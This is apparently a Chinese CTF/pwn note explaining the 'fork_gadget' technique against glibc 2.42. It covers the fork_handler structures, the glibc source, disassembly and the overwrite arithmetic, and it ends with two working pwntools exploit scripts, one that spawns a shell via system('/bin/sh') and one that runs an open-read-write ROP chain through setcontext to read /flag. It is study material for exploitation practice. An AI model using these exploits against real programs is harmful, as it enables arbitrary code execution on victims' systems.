fork_gadget: glibc 2.42 fork handler 利用技术

参考：fork_gadget | Pwn Notes

glibc 2.42#

结构体#

fork_handler#

1
/* Elements of the fork handler lists.  */
2
struct fork_handler {
3
    // 1. Prepare Handler (fork 之前执行)
4
    // 这是我们利用漏洞的【核心目标】。
5
    // 在 fork 系统调用真正发生之前，父进程会执行这个函数。
6
    // 通常用于获取锁，防止死锁。
7
    // 攻击利用点：我们将此指针覆盖为 system 或 setcontext。
8
    void (*prepare_handler) (void);
9

10
    // 2. Parent Handler (fork 之后，父进程执行)
11
    // 在 fork 系统调用返回后，父进程会执行这个函数。
12
    // 通常用于释放 prepare 阶段获取的锁。
13
    void (*parent_handler) (void);
14

15
    // 3. Child Handler (fork 之后，子进程执行)
16
    // 在 fork 系统调用返回后，子进程会执行这个函数。
17
    // 通常用于释放 prepare 阶段获取的锁，并重置子进程的状态。
18
    void (*child_handler) (void);
19

20
    // 4. DSO Handle (动态共享对象句柄)
21
    // 这是一个指针，用于标识注册这个 handler 的动态库（例如 libc.so, libpthread.so）。
22
    // 当动态库被卸载时，glibc 会根据这个句柄移除对应的 handler，防止野指针调用。
23
    // 在漏洞利用中，通常设置为 0 (NULL) 即可。
24
    void *dso_handle;
25

26
    // 5. ID (glibc 2.36+ 新增)
27
    // 一个唯一的 64 位整数，用于标识这个 handler 条目。
28
    // 这是 glibc 为了改进 handler 的管理（如排序或校验）而引入的。
29
    // 攻击利用点：在构造 payload 时，需要按照 0, 1, 2... 的顺序填充这个字段，
30
    // 或者直接填入非零值，以通过 glibc 的内部检查逻辑。
31
    uint64_t id;
32
};

fork_handler_list#

1
struct DYNARRAY_STRUCT
2
{
3
  union
4
  {
5
    /* 1. 抽象头：用于多态 */
6
    struct dynarray_header dynarray_abstract;
7

8
    /* 2. 类型安全头：用于具体实现 */
9
    struct
10
    {
11
      /* 这些字段必须与 struct dynarray_header 内存布局完全一致 */
12
      size_t used;            // 当前数组中已使用的元素数量
13
      size_t allocated;       // 当前已分配的容量（capacity）
14
      DYNARRAY_ELEMENT *array; // 指向实际数据数组的指针（类型安全的指针）
15
    } dynarray_header;
16
  } u;
17

18
#if DYNARRAY_HAVE_SCRATCH
19
  /* 3. 栈上暂存区 (Small String/Buffer Optimization) */
20
  /* 如果数组元素很少（小于 DYNARRAY_INITIAL_SIZE），
21
     数据直接存放在这里，避免 malloc 分配堆内存，提高性能。 */
22
  DYNARRAY_ELEMENT scratch[DYNARRAY_INITIAL_SIZE];
23
#endif
24
};

简化后：

1
struct fork_handler_list {
2
        size_t used;
3
        size_t allocated;
4
        struct fork_handler* array;
5
        struct fork_handler scratch[48];
6
};

相关函数#

fork#

1
#include <fork.h>
2
#include <libio/libioP.h>
3
#include <ldsodefs.h>
4
#include <malloc/malloc-internal.h>
5
#include <nss/nss_database.h>
6
#include <register-atfork.h>
7
#include <stdio-lock.h>
8
#include <sys/single_threaded.h>
9
#include <unwind-link.h>
10

11
static void
12
fresetlockfiles (void)
13
{
14
  _IO_ITER i;
15

16
  for (i = _IO_iter_begin(); i != _IO_iter_end(); i = _IO_iter_next(i))
17
    if ((_IO_iter_file (i)->_flags & _IO_USER_LOCK) == 0)
18
      _IO_lock_init (*((_IO_lock_t *) _IO_iter_file(i)->_lock));
19
}
20

21
pid_t
22
__libc_fork (void)
23
{
24
  bool multiple_threads = !SINGLE_THREAD_P;
25
  uint64_t lastrun;
26

27
  lastrun = __run_prefork_handlers (multiple_threads); //这里
28

29
  struct nss_database_data nss_database_data;
30

31
  if (multiple_threads)
32
    {
33
      call_function_static_weak (__nss_database_fork_prepare_parent,
34
         &nss_database_data);
35

36
      _IO_proc_file_chain_lock ();
37
      _IO_list_lock ();
38

39
      call_function_static_weak (__malloc_fork_lock_parent);
40
    }
41

42
  pid_t pid = _Fork ();
43

44
  if (pid == 0)
45
    {
46
      fork_system_setup ();
47

48
      if (multiple_threads)
49
  {
50
    __libc_unwind_link_after_fork ();
51
    fork_system_setup_after_fork ();
52
    call_function_static_weak (__abort_fork_reset_child);
53
    call_function_static_weak (__malloc_fork_unlock_child);
54
    fresetlockfiles ();
55
    _IO_list_resetlock ();
56
    _IO_proc_file_chain_resetlock ();
57
    call_function_static_weak (__nss_database_fork_subprocess,
58
             &nss_database_data);
59
  }
60

61
      __rtld_lock_initialize (GL(dl_load_lock));
62
      __rtld_lock_initialize (GL(dl_load_tls_lock));
63
      reclaim_stacks ();
64

65
      __run_postfork_handlers (atfork_run_child, multiple_threads, lastrun);
66
    }
67
  else
68
    {
69
      int save_errno = errno;
70

71
      if (multiple_threads)
72
  {
73
    call_function_static_weak (__malloc_fork_unlock_parent);
74
    _IO_list_unlock ();
75
    _IO_proc_file_chain_unlock ();
76
  }
77

78
      __run_postfork_handlers (atfork_run_parent, multiple_threads, lastrun);
79

80
      if (pid < 0)
81
  __set_errno (save_errno);
82
    }
83

84
  return pid;
85
}
86
weak_alias (__libc_fork, __fork)
87
libc_hidden_def (__fork)
88
weak_alias (__libc_fork, fork)

`__run_prefork_handlers`#

1
uint64_t
2
__run_prefork_handlers (_Bool do_locking)
3
{
4
  uint64_t lastrun;
5

6
  /* 如果需要锁定（通常是多线程环境），则获取 atfork 锁 */
7
  if (do_locking)
8
    lll_lock (atfork_lock, LLL_PRIVATE);
9

10
  /* 保存当前的 fork 处理程序计数器，作为本次 fork 操作的截止点 */
11
  lastrun = fork_handler_counter;
12

13
  /* 获取当前注册的 fork 处理程序列表的大小 */
14
  size_t sl = fork_handler_list_size (&fork_handlers);
15

16
  /* 从列表末尾向前遍历处理程序 (LIFO 顺序) */
17
  for (size_t i = sl; i > 0;)
18
    {
19
      struct fork_handler *runp
20
        = fork_handler_list_at (&fork_handlers, i - 1);
21

22
      uint64_t id = runp->id;
23

24
      if (runp->prepare_handler != NULL)
25
        {
26
          if (do_locking)
27
            lll_unlock (atfork_lock, LLL_PRIVATE);
28

29
          runp->prepare_handler (); //利用点
30

31
          if (do_locking)
32
            lll_lock (atfork_lock, LLL_PRIVATE);
33
        }
34

35
      i--;
36

37
      while (i > 0
38
             && fork_handler_list_at (&fork_handlers, i - 1)->id >= id)
39
        i--;
40
    }
41

42
  return lastrun;
43
}

汇编#

1
Dump of assembler code for function __run_prefork_handlers:
2
   0x00007ffff7e8d280 <+0>:     endbr64
3
   0x00007ffff7e8d284 <+4>:     push   rbp
4
   0x00007ffff7e8d285 <+5>:     mov    rbp,rsp
5
   0x00007ffff7e8d288 <+8>:     push   r15
6
   0x00007ffff7e8d28a <+10>:    mov    r15d,edi
7
   0x00007ffff7e8d28d <+13>:    push   r14
8
   0x00007ffff7e8d28f <+15>:    push   r13
9
   0x00007ffff7e8d291 <+17>:    push   r12
10
   0x00007ffff7e8d293 <+19>:    push   rbx
11
   0x00007ffff7e8d294 <+20>:    sub    rsp,0x18
12
   0x00007ffff7e8d298 <+24>:    test   dil,dil
13
   0x00007ffff7e8d29b <+27>:    jne    0x7ffff7e8d330 <__run_prefork_handlers+176>
14
   0x00007ffff7e8d2a1 <+33>:    mov    rdi,QWORD PTR [rip+0x1213d8]        # 0x7ffff7fae680 <fork_handlers>
15
   0x00007ffff7e8d2a8 <+40>:    mov    r12,QWORD PTR [rip+0x1213b9]        # 0x7ffff7fae668 <fork_handler_counter>
16
   0x00007ffff7e8d2af <+47>:    test   rdi,rdi
17
   0x00007ffff7e8d2b2 <+50>:    je     0x7ffff7e8d3b0 <__run_prefork_handlers+304>
18
   0x00007ffff7e8d2b8 <+56>:    mov    r14,rdi
19
   0x00007ffff7e8d2bb <+59>:    lea    rbx,[r14-0x1]
20
=> 0x00007ffff7e8d2bf <+63>:    cmp    rbx,rdi
21
   0x00007ffff7e8d2c2 <+66>:    jae    0x7ffff7e8d3a8 <__run_prefork_handlers+296>
22
   0x00007ffff7e8d2c8 <+72>:    mov    rax,QWORD PTR [rip+0x1213c1]        # 0x7ffff7fae690 <fork_handlers+16>
23
   0x00007ffff7e8d2cf <+79>:    lea    rdx,[rbx+rbx*4]
24
   0x00007ffff7e8d2d3 <+83>:    lea    rdx,[rax+rdx*8]
25
   0x00007ffff7e8d2d7 <+87>:    mov    rcx,QWORD PTR [rdx]
26
   0x00007ffff7e8d2da <+90>:    mov    r13,QWORD PTR [rdx+0x20]
27
   0x00007ffff7e8d2de <+94>:    test   rcx,rcx
28
   0x00007ffff7e8d2e1 <+97>:    je     0x7ffff7e8d2f8 <__run_prefork_handlers+120>
29
   0x00007ffff7e8d2e3 <+99>:    test   r15b,r15b
30
   0x00007ffff7e8d2e6 <+102>:   jne    0x7ffff7e8d360 <__run_prefork_handlers+224>
31
   0x00007ffff7e8d2e8 <+104>:   call   rcx
32
   0x00007ffff7e8d2ea <+106>:   mov    rdi,QWORD PTR [rip+0x12138f]        # 0x7ffff7fae680 <fork_handlers>
33
   0x00007ffff7e8d2f1 <+113>:   mov    rax,QWORD PTR [rip+0x121398]        # 0x7ffff7fae690 <fork_handlers+16>
34
   0x00007ffff7e8d2f8 <+120>:   lea    rdx,[r14+r14*4]
35
   0x00007ffff7e8d2fc <+124>:   lea    rax,[rax+rdx*8-0x30]
36
   0x00007ffff7e8d301 <+129>:   jmp    0x7ffff7e8d319 <__run_prefork_handlers+153>
37
   0x00007ffff7e8d303 <+131>:   nop    DWORD PTR [rax+rax*1+0x0]
38
   0x00007ffff7e8d308 <+136>:   sub    rax,0x28
39
   0x00007ffff7e8d30c <+140>:   cmp    QWORD PTR [rax+0x28],r13
40
   0x00007ffff7e8d310 <+144>:   jb     0x7ffff7e8d398 <__run_prefork_handlers+280>
41
   0x00007ffff7e8d316 <+150>:   mov    rbx,rsi
42
   0x00007ffff7e8d319 <+153>:   test   rbx,rbx
43
   0x00007ffff7e8d31c <+156>:   je     0x7ffff7e8d3b0 <__run_prefork_handlers+304>
44
   0x00007ffff7e8d322 <+162>:   lea    rsi,[rbx-0x1]
45
   0x00007ffff7e8d326 <+166>:   cmp    rsi,rdi
46
   0x00007ffff7e8d329 <+169>:   jb     0x7ffff7e8d308 <__run_prefork_handlers+136>
47
   0x00007ffff7e8d32b <+171>:   call   0x7ffff7e2ab60 <__GI___libc_dynarray_at_failure>
48
   0x00007ffff7e8d330 <+176>:   xor    eax,eax
49
   0x00007ffff7e8d332 <+178>:   mov    edx,0x1
50
   0x00007ffff7e8d337 <+183>:   lock cmpxchg DWORD PTR [rip+0x121321],edx        # 0x7ffff7fae660 <atfork_lock>
51
   0x00007ffff7e8d33f <+191>:   je     0x7ffff7e8d2a1 <__run_prefork_handlers+33>
52
   0x00007ffff7e8d345 <+197>:   lea    rdi,[rip+0x121314]        # 0x7ffff7fae660 <atfork_lock>
53
   0x00007ffff7e8d34c <+204>:   call   0x7ffff7e139a0 <__GI___lll_lock_wait_private>
54
   0x00007ffff7e8d351 <+209>:   jmp    0x7ffff7e8d2a1 <__run_prefork_handlers+33>
55
   0x00007ffff7e8d356 <+214>:   cs nop WORD PTR [rax+rax*1+0x0]
56
   0x00007ffff7e8d360 <+224>:   xor    eax,eax
57
   0x00007ffff7e8d362 <+226>:   xchg   DWORD PTR [rip+0x1212f8],eax        # 0x7ffff7fae660 <atfork_lock>
58
   0x00007ffff7e8d368 <+232>:   cmp    eax,0x1
59
   0x00007ffff7e8d36b <+235>:   jg     0x7ffff7e8d3c2 <__run_prefork_handlers+322>
60
   0x00007ffff7e8d36d <+237>:   call   QWORD PTR [rdx]
61
   0x00007ffff7e8d36f <+239>:   xor    eax,eax
62
   0x00007ffff7e8d371 <+241>:   mov    edx,0x1
63
   0x00007ffff7e8d376 <+246>:   lock cmpxchg DWORD PTR [rip+0x1212e2],edx        # 0x7ffff7fae660 <atfork_lock>
64
   0x00007ffff7e8d37e <+254>:   jne    0x7ffff7e8d3da <__run_prefork_handlers+346>
65
   0x00007ffff7e8d380 <+256>:   mov    rdi,QWORD PTR [rip+0x1212f9]        # 0x7ffff7fae680 <fork_handlers>
66
   0x00007ffff7e8d387 <+263>:   mov    rax,QWORD PTR [rip+0x121302]        # 0x7ffff7fae690 <fork_handlers+16>
67
   0x00007ffff7e8d38e <+270>:   jmp    0x7ffff7e8d2f8 <__run_prefork_handlers+120>
68
   0x00007ffff7e8d393 <+275>:   nop    DWORD PTR [rax+rax*1+0x0]
69
   0x00007ffff7e8d398 <+280>:   mov    r14,rbx
70
   0x00007ffff7e8d39b <+283>:   lea    rbx,[r14-0x1]
71
   0x00007ffff7e8d39f <+287>:   cmp    rbx,rdi
72
   0x00007ffff7e8d3a2 <+290>:   jb     0x7ffff7e8d2c8 <__run_prefork_handlers+72>
73
   0x00007ffff7e8d3a8 <+296>:   mov    rsi,rbx
74
   0x00007ffff7e8d3ab <+299>:   call   0x7ffff7e2ab60 <__GI___libc_dynarray_at_failure>
75
   0x00007ffff7e8d3b0 <+304>:   add    rsp,0x18
76
   0x00007ffff7e8d3b4 <+308>:   mov    rax,r12
77
   0x00007ffff7e8d3b7 <+311>:   pop    rbx
78
   0x00007ffff7e8d3b8 <+312>:   pop    r12
79
   0x00007ffff7e8d3ba <+314>:   pop    r13
80
   0x00007ffff7e8d3bc <+316>:   pop    r14
81
   0x00007ffff7e8d3be <+318>:   pop    r15
82
   0x00007ffff7e8d3c0 <+320>:   pop    rbp
83
   0x00007ffff7e8d3c1 <+321>:   ret
84
   0x00007ffff7e8d3c2 <+322>:   lea    rdi,[rip+0x121297]        # 0x7ffff7fae660 <atfork_lock>
85
   0x00007ffff7e8d3c9 <+329>:   mov    QWORD PTR [rbp-0x38],rdx
86
   0x00007ffff7e8d3cd <+333>:   call   0x7ffff7e13a60 <__GI___lll_lock_wake_private>
87
   0x00007ffff7e8d3d2 <+338>:   mov    rdx,QWORD PTR [rbp-0x38]
88
   0x00007ffff7e8d3d6 <+342>:   call   QWORD PTR [rdx]
89
   0x00007ffff7e8d3d8 <+344>:   jmp    0x7ffff7e8d36f <__run_prefork_handlers+239>
90
   0x00007ffff7e8d3da <+346>:   lea    rdi,[rip+0x12127f]        # 0x7ffff7fae660 <atfork_lock>
91
   0x00007ffff7e8d3e1 <+353>:   call   0x7ffff7e139a0 <__GI___lll_lock_wait_private>
92
   0x00007ffff7e8d3e6 <+358>:   jmp    0x7ffff7e8d380 <__run_prefork_handlers+256>

流程分析#

首先，我们看 fork_handlers 全局变量在内存中的样子。它的类型是 struct fork_handler_list。

1
struct fork_handler_list {
2
    size_t used;                  // Offset: 0x00 (0)
3
    size_t allocated;             // Offset: 0x08 (8)
4
    struct fork_handler* array;   // Offset: 0x10 (16) <-- 关键指针！
5
    struct fork_handler scratch[48]; // Offset: 0x18 (24) ...
6
};

同时，数组中的每个元素是 struct fork_handler：

1
struct fork_handler {
2
    void (*prepare_handler) (void); // Offset: 0x00
3
    // ... 其他字段 ...
4
    uint64_t id;                    // Offset: 0x20
5
}; // Total Size: 0x28 (40 bytes)

我们看 __run_prefork_handlers 中的关键指令：

第一步：获取 `used` (RDI)#

1
mov    rdi, QWORD PTR [rip+0x1213d8]  # 加载 fork_handlers (偏移0x00)

对应 C 代码：rdi = fork_handlers.used
攻击操作：我们将内存中 fork_handlers 的前 8 字节（即 used）覆盖为 /bin/sh 的地址（记为 Target_RDI）。
此时寄存器状态：rdi = Target_RDI

第二步：准备循环索引 (RBX)#

1
mov    r14, rdi       # r14 = used
2
lea    rbx, [r14-0x1] # rbx = used - 1

对应逻辑：glibc 是从后往前遍历数组的，所以第一个要访问的元素的索引是 used - 1。
此时寄存器状态：rbx = Target_RDI - 1

第三步：获取 `array` 指针 (RAX)#

1
mov    rax, QWORD PTR [rip+0x1213c1]  # 加载 fork_handlers+16 (偏移0x10)

对应 C 代码：rax = fork_handlers.array
注意：0x10 (16) 正好是 used (8字节) + allocated (8字节) 之后的偏移。
攻击操作：我们将内存中 fork_handlers + 16 处覆盖为我们计算出的 Fake_Array_Base。
此时寄存器状态：rax = Fake_Array_Base

第四步：计算目标地址 (RDX)#

1
lea    rdx, [rbx+rbx*4] # rdx = rbx * 5
2
lea    rdx, [rax+rdx*8] # rdx = rax + (rbx * 5) * 8 = rax + rbx * 40

数学公式：rdx = array + index * sizeof(struct fork_handler)
代入我们的值：

\text{Target\_Addr} = \text{Fake\_Array\_Base} + (\text{Target\_RDI} - 1) \times 40

第五步：调用函数#

1
mov    rcx, QWORD PTR [rdx] # 读取结构体第一个成员 (prepare_handler)
2
call   rcx                  # 执行

攻击计算逻辑 (The Exploit Math)#

我们现在是攻击者，我们想要 call rcx 最终执行 system，且此时 rdi 是 /bin/sh。

已知条件：

Target_RDI = /bin/sh 地址（例如 0x7ffff7fae780）。
Real_Payload_Addr = 我们在内存中实际写入伪造结构体的地方（例如 0x555555558000）。
struct size = 40 (0x28)。

方程：

我们需要构造一个 Fake_Array_Base，使得 glibc 计算出的地址正好指向我们的 Payload。

\text{Fake\_Array\_Base} + (\text{Target\_RDI} - 1) \times 40 = \text{Real\_Payload\_Addr}

变换求解：

\text{Fake\_Array\_Base} = \text{Real\_Payload\_Addr} - [(\text{Target\_RDI} - 1) \times 40]

处理溢出 (Wrap-around)：

由于 Target_RDI 很大，方括号里的乘积会非常大。直接相减会得到负数。在 64 位系统中，负数是以补码形式存储的，这等价于模运算：

\text{Fake\_Array\_Base} = (\text{Real\_Payload\_Addr} - [(\text{Target\_RDI} - 1) \times 40]) \pmod{2^{64}}

n 代表有几个 handler：

\text{Fake\_Array\_Base} = (\text{Real\_Payload\_Addr} - [(\text{Target\_RDI} - n) \times 40]) \pmod{2^{64}}

Exploit#

shell#

1
fork_handlers_offset = 0x23b680 # <--- 修改这里！
2
fork_handlers_addr = libc.address + fork_handlers_offset
3

4
success(f"Target fork_handlers: {hex(fork_handlers_addr)}")
5

6
# 1. 查找 /bin/sh 地址作为目标 RDI
7
rdi_target = next(libc.search(b"/bin/sh\x00"))
8
success(f"Target RDI (/bin/sh): {hex(rdi_target)}")
9

10
# 2. 确定 Payload 存放的真实物理地址
11
# 我们把伪造的 handler 放在 fork_handlers 后面一点的地方
12
real_payload_addr = fork_handlers_addr + 0x100
13
success(f"Real Payload Address: {hex(real_payload_addr)}")
14

15
def arbitrary_write(addr, value):
16
  sla(b"> ", b"1")
17
  sla(b"Address (hex): ", hex(addr).encode())
18
  sla(b"Value to write (hex): ", hex(value).encode())
19
  ru(b"Write done.")
20

21
# 3. 构造 Fake Handler 结构体
22
# struct fork_handler {
23
#     void (*prepare_handler)(void); <-- 我们写入 system
24
#     ...
25
#     uint64_t id; <-- 偏移 0x20
26
# }
27
arbitrary_write(real_payload_addr, libc.sym['system'])
28
# ID 字段 (偏移 32)，填 0 即可
29
arbitrary_write(real_payload_addr + 32, 0)
30

31
# 4. 计算 Fake Array Base (核心数学魔法)
32
# 汇编逻辑：rdx = (rdi - 1) * 40
33
# 目标地址 = ArrayBase + rdx
34
# 所以：ArrayBase = (目标地址 - rdx) % 2^64
35
offset = (rdi_target - 1) * 40
36
fake_array_base = (real_payload_addr - offset) % (1<<64)
37
success(f"Calculated Fake Array Base: {hex(fake_array_base)}")
38

39
# 5. 实施攻击
40
# 写入 fork_handlers.used (将被加载到 RDI)
41
arbitrary_write(fork_handlers_addr, rdi_target)
42

43
# 写入 fork_handlers.array (指向我们的 Fake Base)
44
# 注意：fork_handlers 结构体中，used 是偏移 0，allocated 是偏移 8，array 是偏移 16
45
arbitrary_write(fork_handlers_addr + 16, fake_array_base)

orw#

1
fork_handlers_offset = 0x23b680
2
    fork_handlers_addr = libc.address + fork_handlers_offset
3
    success(f"Target fork_handlers: {hex(fork_handlers_addr)}")
4

5
    ctx_addr = fork_handlers_addr + 0x200
6
    success(f"Context Address (RDI target): {hex(ctx_addr)}")
7

8
    real_payload_addr = fork_handlers_addr + 0x8 #存放prepare_handler的地址
9

10
    num_handlers = 2
11
    offset = (ctx_addr - num_handlers) * 40
12
    fake_array_base = (real_payload_addr - offset) % (1<<64)
13
    success(f"Calculated Fake Array Base: {hex(fake_array_base)}")
14

15
    payload = b""
16
    payload += p64(ctx_addr)        # +0x00: used
17
    payload += p64(libc.sym['setcontext'])               # +0x08: allocated && prepare_handler
18
    payload += p64(fake_array_base) # +0x10: array ptr && parent, child, dso
19
    payload += p64(0) * 2                  # parent, child, dso
20
    payload += p64(0)                      # id = 0
21
    payload += p64(libc.sym['gets'])       # prepare_handler
22
    payload += p64(0) * 3                  # parent, child, dso
23
    payload += p64(1)                      # id = 1
24

25
    s(p64(fork_handlers_addr) + p64(len(payload)))
26
    pause()
27
    s(payload)
28

29

30
    rop = ROP(libc)
31
    ret = rop.find_gadget(["ret"])[0]
32
    pop_rdi = rop.find_gadget(["pop rdi", "ret"])[0]
33
    pop_rsi = rop.find_gadget(["pop rsi", "ret"])[0]
34
    pop_rax = rop.find_gadget(["pop rax", "ret"])[0]
35
    syscall = rop.find_gadget(["syscall", "ret"])[0]
36

37
    flag_str_addr = ctx_addr + 0x400
38

39
    chain = flat([
40
        # openat(0,"flag", 0)
41
        pop_rdi, 0,
42
        pop_rsi, flag_str_addr,
43
        pop_rax, constants.SYS_openat,
44
        syscall,
45

46
        # read(3, flag_str_addr, 0x100)
47
        pop_rdi, 3, # fd
48
        pop_rsi, flag_str_addr, # buf
49
        pop_rax, constants.SYS_read,
50
        syscall,
51

52
        # write(1, flag_str_addr, 0x100)
53
        pop_rdi, 1, # fd
54
        pop_rax, constants.SYS_write,
55
        syscall
56
    ])
57

58

59
    ucontext_len = len((build_ucontext(0,0)))
60
    rop_start_addr = ctx_addr + ucontext_len
61

62
    ucontext = build_ucontext(rsp=rop_start_addr, rip=ret, rdx=0x100)
63
    payload2 = b''
64
    payload2 += ucontext
65
    payload2 += chain
66
    payload2 = payload2.ljust(0x400, b'\x00')
67
    payload2 += b"/flag\x00"
68

69
    if b'\n' in payload2:
70
        log.warning("Payload contains newline! gets() might truncate it.")
71

72
    pause()
73
    sl(payload2)